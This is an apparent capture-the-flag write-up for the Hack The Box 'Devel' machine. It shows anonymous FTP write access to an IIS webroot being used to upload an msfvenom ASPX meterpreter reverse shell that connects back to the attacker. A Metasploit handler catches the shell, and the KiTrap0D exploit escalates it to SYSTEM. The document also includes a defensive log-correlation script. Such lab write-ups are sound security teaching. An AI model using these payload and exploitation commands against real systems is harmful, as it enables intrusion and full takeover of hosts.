Hack The Box: Devel
About
Name: Devel
IP Address: 10.10.10.5
Operating System: Windows
Difficulty: 3.7/10
Base Points: 20
Enumeration
As always we start with an Nmap scan to discover open ports and the services running on the server:
nmap -sC -sV 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-09 17:32 CET
Nmap scan report for 10.10.10.5
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM DIR aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Looking at the Nmap scan we have two open ports: 21 (FTP) and 80 (HTTP).
We also have access to the FTP server if we log in as Anonymous.
Initial Foothold
Going to the website reveals nothing special. Just a standard IIS page:
Let's check the FTP server as well.
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM DIR aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
Okay, we have read access. But what about write access? If we can write files to the FTP server we can probably upload code and get a reverse shell working.
Testing confirms that we can write files to the FTP server and then fetch them through the HTTP server, so the FTP directory is the IIS webroot (the listing matches the files Nmap showed).
Let's create and upload an .aspx shell and see if we can get the server to connect back to us.
Create ASPX Shell And Upload
As usual we use msfvenom to create the payload. We specify a windows/meterpreter/reverse_tcp payload that connects back to us on port 4444, set the output format to aspx, and write the result to shell.aspx:
msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.14.8 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2814 bytes
Now we need to upload the shell to the server.
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2850 bytes sent in 0.00 secs (33.5552 MB/s)
Awesome! The shell uploads successfully!
Now we need to set up Metasploit to handle the connect-back and the second stage of the meterpreter session.
Metasploit
root@kali:~# msfdb run
[i] Database already started
=[ metasploit v4.17.21-dev ]
+ -- --=[ 1822 exploits - 1033 auxiliary - 316 post ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.14.8
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
I use exploit/multi/handler with the windows/meterpreter/reverse_tcp payload.
I set LPORT to the port we defined in our .aspx payload, and LHOST to tun0, which is my tunnel/VPN interface connecting to HackTheBox.
You can also specify your HTB IP address instead of tun0.
Finally we run the handler, and it is now listening for something to connect back to us.
If we now browse to http://10.10.10.5/shell.aspx, IIS executes the uploaded page, our shellcode runs, and we get a connect-back.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.5:49158) at 2019-01-09 17:48:47 +0100
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web
Awesome! The server connected back to us and we got a meterpreter shell!
But we are only running as IIS APPPOOL\Web, the application pool identity. So we need to escalate our privileges!
The server seems to be running Windows 7 (Build 7600), so there should be a few vulnerabilities we can exploit.
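The foothold above relies on an anonymous FTP upload landing in the IIS webroot and then being requested over HTTP. As an added example that is not part of the original writeup, the following Python script correlates the two sides of that chain from a defender's view: it parses W3C-format FTP and IIS logs and alerts when an anonymous STOR of a server-side script is later followed by an HTTP request for the same file. The log lines are constructed, and the field set is assumed to follow each log's #Fields header.

```python
"""Correlate anonymous FTP uploads of server-side scripts with later HTTP
requests for the same file (constructed W3C-format sample logs)."""
import re
from collections import defaultdict

# Constructed sample logs in the W3C extended format written by the Microsoft
# FTP service and IIS; the field order is taken from the #Fields header.
FTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2019-01-09 16:40:01 10.10.14.8 - 10.10.10.5 21 USER Anonymous 331
2019-01-09 16:40:01 10.10.14.8 Anonymous 10.10.10.5 21 PASS *** 230
2019-01-09 16:40:09 10.10.14.8 Anonymous 10.10.10.5 21 RETR iisstart.htm 226
2019-01-09 16:41:15 10.10.14.8 Anonymous 10.10.10.5 21 STOR shell.aspx 226
2019-01-09 16:42:00 10.10.14.9 Anonymous 10.10.10.5 21 STOR notes.txt 226
"""
HTTP_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2019-01-09 16:43:30 10.10.10.5 GET /iisstart.htm - 80 10.10.14.8 200
2019-01-09 16:44:02 10.10.10.5 GET /shell.aspx - 80 10.10.14.8 200
"""
# Extensions IIS hands to the ASP.NET handler, i.e. uploads that execute on request.
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|cshtml)$", re.IGNORECASE)

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_webroot_uploads(ftp_log, http_log):
    """Return (ftp_record, http_record) pairs where an anonymous STOR of a
    script file is followed, at or after the upload time, by an HTTP request
    for a file of the same name."""
    uploads = defaultdict(list)
    for rec in parse_w3c(ftp_log):
        if (rec["cs-method"] == "STOR" and rec["cs-username"].lower() == "anonymous"
                and SCRIPT_EXT.search(rec["cs-uri-stem"])):
            uploads[rec["cs-uri-stem"].rsplit("/", 1)[-1].lower()].append(rec)
    hits = []
    for rec in parse_w3c(http_log):
        name = rec["cs-uri-stem"].rsplit("/", 1)[-1].lower()
        for up in uploads.get(name, []):
            if f"{up['date']} {up['time']}" <= f"{rec['date']} {rec['time']}":
                hits.append((up, rec))
    return hits

if __name__ == "__main__":
    for up, req in find_webroot_uploads(FTP_LOG, HTTP_LOG):
        print(f"ALERT: {up['c-ip']} uploaded {up['cs-uri-stem']} via anonymous FTP at "
              f"{up['date']} {up['time']}; {req['c-ip']} requested {req['cs-uri-stem']} "
              f"over HTTP at {req['date']} {req['time']}")
```

The same correlation, applied to real logs, flags the shell.aspx upload and ignores the harmless notes.txt; disabling anonymous write access on the FTP site removes the condition entirely.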
Privilege Escalation
Metasploit has an awesome post module called local_exploit_suggester. Let's run it against our session and see if it discovers potential exploits we can use to elevate our privileges.
meterpreter > background
[*] Backgrounding session 1...
msf > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 28 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
We background our meterpreter session and use the post module multi/recon/local_exploit_suggester.
We point it at session 1 (our meterpreter session) and run it.
We get quite a few suggestions back from the module. Let's try MS10-015 (KiTrap0D).
msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 3624 launched.
[*] Reflectively injecting the exploit DLL into 3624...
[*] Injecting exploit into 3624 ...
[*] Exploit injected. Injecting payload into 3624...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.5:49158) at 2019-01-09 18:25:47 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Boom! NT AUTHORITY\SYSTEM.
We can now grab both user.txt and root.txt.
C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6...4cb3e8
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0...c72b4b
Further Reading
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-015